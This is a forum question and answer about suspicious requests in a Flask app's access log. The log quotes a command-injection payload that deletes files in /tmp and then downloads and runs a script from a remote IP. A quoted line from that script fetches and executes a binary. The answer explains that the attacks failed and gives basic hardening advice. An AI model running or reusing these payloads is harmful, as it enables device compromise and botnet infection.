# Weird connection to Flask app. Can it be harmful?

Tags: security, flask

I made a small website using Flask to help me and my friends organize school material and to able to access them easy.

I in the connection history i found this:

```
185.224.128.191 - - [16/Jan/2024 16:00:56] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp;%20rm%20-rf%20*;%20wget%20http%3A%2F%2F104.168.5.4%2Ftenda.sh;%20chmod%20777%20tenda.sh;.%2Ftenda.sh) HTTP/1.1" 404 -

188.214.132.164 - - [16/Jan/2024 16:06:27] "CONNECT 84.32.188.22:602 HTTP/1.1" 404 -
```

Should I rethink my method of hosting? hehe...
I looked though the tenda.sh file and it seems to do a bunch of stuff and includes a lot of really bad words..

Heres an example of a line in tenda.sh

```
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O "BADWORD" http://104.168.5.4/arm7; chmod +x "BADWORD"; ./"BADWORD" tplink
```

The site is down for now.

Thanks..

Answer (score 1):

I understand that it looks bad, but there is no need to worry at this point in time.
It is common that bad actors are running scripts which try to exploit accessible servers on the Internet with common attacks.

In your case, the bad actor tried two attacks:

1. Command Injection attack: A Command Injection Attack which, **if** successful, would have downloaded the tenda.sh file on your system and executed it.
2. Proxy Request Attack: Connected to your Server and used it as a Proxy. In this case, he tried to use the PORT 602.

Both of the attacks failed. 404 - Not Found means that the Server didn't fulfill the requests from the bad actor.

You can still host your own Server, just follow some basic rules. I can recommend this reddit post: https://www.reddit.com/r/selfhosted/comments/pufhs0/beginner_guide_how_to_secure_your_selfhosted/

Also try to keep all your applications and services on the Server up to date. :)

I hope it helped. :D

Comment: Thank you very much! :D I saw the 404 but didn't really trust it. Paranoid!